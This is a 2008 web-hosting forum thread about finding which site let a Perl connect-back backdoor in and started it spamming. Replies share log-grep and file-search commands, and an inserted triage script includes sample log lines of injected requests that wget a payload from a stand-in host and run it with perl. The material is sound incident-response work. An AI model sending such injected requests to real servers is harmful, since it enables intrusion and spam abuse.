Atomic Secure Linux
Post subject: secure /tmp from PERL scripts
Posted: Fri Feb 08, 2008 9:54 am
Forum User

Joined: Wed Jun 06, 2007 10:49 am
Posts: 94
Hello all,

I have a Plesk 8.3.0 system, with CentOS 5, and all working fine, with SA, mod_security2, etc.

Recently I discovered a worm/backdoor in my /tmp (and it's mounted as noexec, etc.).

The backdoor is a mail spammer:

perl dc.txt
Data Cha0s Connect Back Backdoor

Usage: dc.txt [Host] <Port>

It's in Perl, and if I do `perl dc.txt` it works fine! (and it's on the noexec /tmp partition :S)

Now I have lots of spam:

qmailr 17179 0.0 0.0 3360 672 ? S 14:49 0:00 qmail-remote bol.com.br apache@newlightsystems.com felicianoriacho@bol.com.br
qmailr 17180 0.0 0.0 4720 1052 ? S 14:49 0:00 /var/qmail/bin/qmail-remote.moved bol.com.br apache@newlightsystems.com felicianoriacho@bol.com.br


And I wanted to know how to find out which website is causing this. I have 150 domains, so it's quite slow to check domain by domain.

Any illumination here?

Thanks


Post subject: logs are your friend
Posted: Fri Feb 08, 2008 3:03 pm
Forum User

Joined: Wed Feb 21, 2007 7:56 pm
Posts: 16
They got in through a vulnerable script, so search through your logs for the file in question (dc.txt). Then you can locate the hacker's IP address, and search for that also.

Code:
grep -i "dc.txt" /var/www/vhosts/*/statistics/logs/access_log


To search for general nasty commands trying to exploit vulnerable scripts:

Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/www/vhosts/*/statistics/logs/access_log


Usually when someone gets access they try to hide code in any directory that's writable by apache.

Use these commands to search for .php, .pl, .cgi files which are owned by apache (they usually hide them in tmp or upload directories):

Code:
find / -name \* -user apache -ls | egrep '(\.php|\.cgi|\.pl)'


Also they usually like to drop a crontab entry for apache. Make sure that you don't have anything bad in your apache cron:
Code:
cat /var/spool/cron/apache
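
The log checks above, as an added triage script that is not from this thread: it runs the same patterns over every vhost access_log, names the vhost that served the requests, and counts hits per client IP. LOGDIR, the vhost names and the log lines are constructed stand-ins for /var/www/vhosts/*/statistics/logs.

```shell
#!/bin/sh
# Added triage helper (not code from the thread): applies the grep patterns
# from the post above to every vhost access_log and reports which site and
# which client IP fetched the suspect file. LOGDIR, the vhost names and the
# log lines below are constructed stand-ins for /var/www/vhosts/*/statistics/logs.
LOGDIR="${LOGDIR:-$(mktemp -d)}"
PATTERN='dc\.txt|chr\(|system\(|(curl|wget|chmod|gcc|perl)%20'

# Constructed sample logs: one clean vhost and one that served the injected requests.
mkdir -p "$LOGDIR/good.example/statistics/logs" "$LOGDIR/victim.example/statistics/logs"
cat > "$LOGDIR/good.example/statistics/logs/access_log" <<'EOF'
203.0.113.5 - - [08/Feb/2008:14:40:01 -0500] "GET /index.php HTTP/1.1" 200 1234
EOF
cat > "$LOGDIR/victim.example/statistics/logs/access_log" <<'EOF'
198.51.100.9 - - [08/Feb/2008:14:48:10 -0500] "GET /modules/news/index.php?cmd=wget%20http://evil.invalid/dc.txt HTTP/1.1" 200 55
198.51.100.9 - - [08/Feb/2008:14:48:12 -0500] "GET /modules/news/index.php?cmd=perl%20/tmp/dc.txt HTTP/1.1" 200 55
203.0.113.7 - - [08/Feb/2008:14:50:00 -0500] "GET /index.php HTTP/1.1" 200 1234
EOF

# Vhosts whose log contains a matching request, one name per line.
suspect_vhosts() {
    grep -liE "$PATTERN" "$LOGDIR"/*/statistics/logs/access_log 2>/dev/null \
        | awk -F/ '{print $(NF-3)}' | sort -u
}

# Client IPs behind the matching requests: hit count first, busiest IP on top.
attacker_ips() {
    grep -hiE "$PATTERN" "$LOGDIR"/*/statistics/logs/access_log 2>/dev/null \
        | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Every request a given IP made across all vhosts (the post's "search for that also").
# Exact string compare on the first field, so the dots in the IP are not regex wildcards.
ip_activity() {
    awk -v ip="$1" '$1 == ip {print FILENAME ": " $0}' \
        "$LOGDIR"/*/statistics/logs/access_log
}

suspect_vhosts
attacker_ips
ip_activity 198.51.100.9
```

Point LOGDIR at the real vhosts root to run it against live logs; the request line of each hit shows which script the requests targeted.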


Posted: Fri Feb 08, 2008 4:12 pm
Forum User

Joined: Wed Jun 06, 2007 10:49 am
Posts: 94
Hello,

Good tips, thank you, I will try later.


Post subject: Re: secure /tmp from PERL scripts
Posted: Fri Feb 08, 2008 5:41 pm
Long Time Forum Regular

Joined: Sat Aug 20, 2005 9:30 am
Posts: 2812
Location: The Netherlands
CrK01 wrote:
It's in PERL, and if I do perl dc.txt it works fine ! ( and it's noexec /tmp part :S )


You're executing /usr/bin/perl and that is not on the noexec /tmp partition. This is why mounting /tmp as noexec is not really useful against exploit scripts. It would have stopped executing '/tmp/dc.txt' (after setting the execute bit on it). And it would have stopped a binary in /tmp from executing, but the attacker could just run a script to copy the binary to some other place on the system that's not mounted noexec (this is why directories with 777 permissions are nasty).

Are you running the grsec-enabled ASL kernel? Because if you are then I don't believe the apache user should have been allowed to execute something like 'perl /tmp/dc.txt'.

_________________
Lemonbit Internet Dedicated Server Management


Post subject: register globals
Posted: Fri Feb 08, 2008 6:07 pm
Forum User

Joined: Wed Feb 21, 2007 7:56 pm
Posts: 16
Also I've found that most of these exploits are with older sites which needed register_globals enabled for them to work (a very bad practice).

To search for sites that have register_globals enabled in .htaccess:

Code:
egrep -Ri --include=.htaccess '(register_globals on|register_globals 1)' /var/www/vhosts/


Posted: Fri Feb 08, 2008 6:34 pm
Atomicorp Staff - Site Admin

Joined: Wed Dec 31, 1969 8:00 pm
Posts: 7420
Location: earth
That whole "securing /tmp" thing has been snake oil from day one. It hasn't ever worked.


Posted: Sat Feb 09, 2008 9:14 pm
Forum User

Joined: Wed Jun 06, 2007 10:49 am
Posts: 94
Hello again.

Using danami's tips, I can't locate the website that executed dc.txt with the egrep commands, but I will try to find it by searching for other things, as this is probably a PHP-Nuke or some other CMS that is not updated.

I think it's a real problem for hosting like I do, as there are lots of different websites, portals, CMSs, forums, and I need real flexibility. The best way to secure this is to jail Apache in its own location, and I have tried it without a good result.

/tmp is needed by many programs and as I can see there's no way to real-secure this.

If I load mod_security with thousands of rules, I will probably detect more worms like this or exploits / script kiddies, but most of my websites will be down.

Are you running the grsec-enabled ASL kernel? --> No, I'm running:

Linux 2.6.18-53.1.4.el5 #1 SMP Fri Nov 30 00:45:16 EST 2007 i686 i686 i386 GNU/Linux ( CENTOS 5 )

I'm searching for a good way to permit my clients to install all their CMSs but with good security. By good security I understand that if a CMS is vulnerable to any attack, the exploit won't work on my server.

cheers,


Posted: Sun Feb 10, 2008 11:18 am
Forum User

Joined: Wed Feb 21, 2007 7:56 pm
Posts: 16
If you are feeling adventurous then maybe mod_suphp is right for you. Look at step 18:
http://www.web-hosting-control-panel-ad ... _Server/6/


Posted: Sun Feb 10, 2008 11:26 am
Atomicorp Staff - Site Admin

Joined: Wed Dec 31, 1969 8:00 pm
Posts: 7420
Location: earth
/tmp is not the threat in this case, it's just a directory the application happens to be able to write to. I've seen bad guys use the httpdocs/ dir just as often as anything else. The real threat here is your applications; I'd start by getting a handle on what those are. Sites like securityfocus and secunia

Are you running ASL already? If not that is a good place to start. If you're running into modsec rules that are causing problems with your sites, let us know so we can update the rules.

mod_suphp changes the threat around; I don't think it would affect the situation here in a positive or negative way (well, maybe negative). Specifically, the tactic being exploited here is:

1) a vulnerable application will execute code uploaded
2) apache runs as the apache user, meaning it can only write to world writable dirs like /tmp, or bad permissions on user owned files/dirs (chmod 777), or apache writable caching dirs (used by smarty, joomla, etc.)
3) mod_suphp would run the application as the owner of the directory/files, meaning that the attacker can now write not only to the elements in 2, but also to all files owned by the user (httpdocs/*), including being able to upload/modify the application itself.


Posted: Thu Feb 14, 2008 1:02 pm
Forum User

Joined: Wed Jun 06, 2007 10:49 am
Posts: 94
Hi again,

No, I haven't got the ASL kernel or ASL at all.

Supposing that I'm managing about 150 domains (and 200 subdomains for one domain) with lots of different CMSs, will there be any problem changing the kernel to the ASL kernel or the ASL system?

Until now, I have had my own modsecurity rules (also downloaded from gotroot.com, and other custom ones), and if there's a website that isn't working well I make an exception, all OK.

But I want to avoid this external code execution (typical bug with phpBB, loading another external script) and code execution inside (Perl scripts, Linux scripts, etc.).

Will mod_suphp help with this? I'm planning to add mod_suphp too (so users can upload gallery photos, for example, and then delete them via FTP), but I have read that this mod changes all configs when Plesk is updated, for example.

thanks,


Posted: Thu Feb 14, 2008 1:07 pm
Atomicorp Staff - Site Admin

Joined: Wed Dec 31, 1969 8:00 pm
Posts: 7420
Location: earth
Nope, there wouldn't be any problem with it on a box like that.

